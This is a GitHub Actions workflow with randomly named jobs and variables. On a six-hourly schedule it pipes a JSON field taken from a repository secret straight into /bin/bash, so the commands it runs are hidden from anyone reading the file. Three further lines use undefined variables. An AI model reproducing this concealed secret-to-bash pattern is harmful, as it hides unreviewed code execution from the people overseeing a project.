name: qingtongqingong
on:
  workflow_dispatch:
  schedule:
    - cron: '39 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qingtongqingong
        env:
          jg226: ${{ secrets.jg226 }}
        run: |
          echo $jg226 | jq -r .nzs60 | /bin/bash
          echo $yemh76044 | jq -r .iywup085 | /bin/bash
          echo $ud913 | jq -r .e20 | /bin/bash
          echo $rmg69700 | jq -r .wf318 | /bin/bash

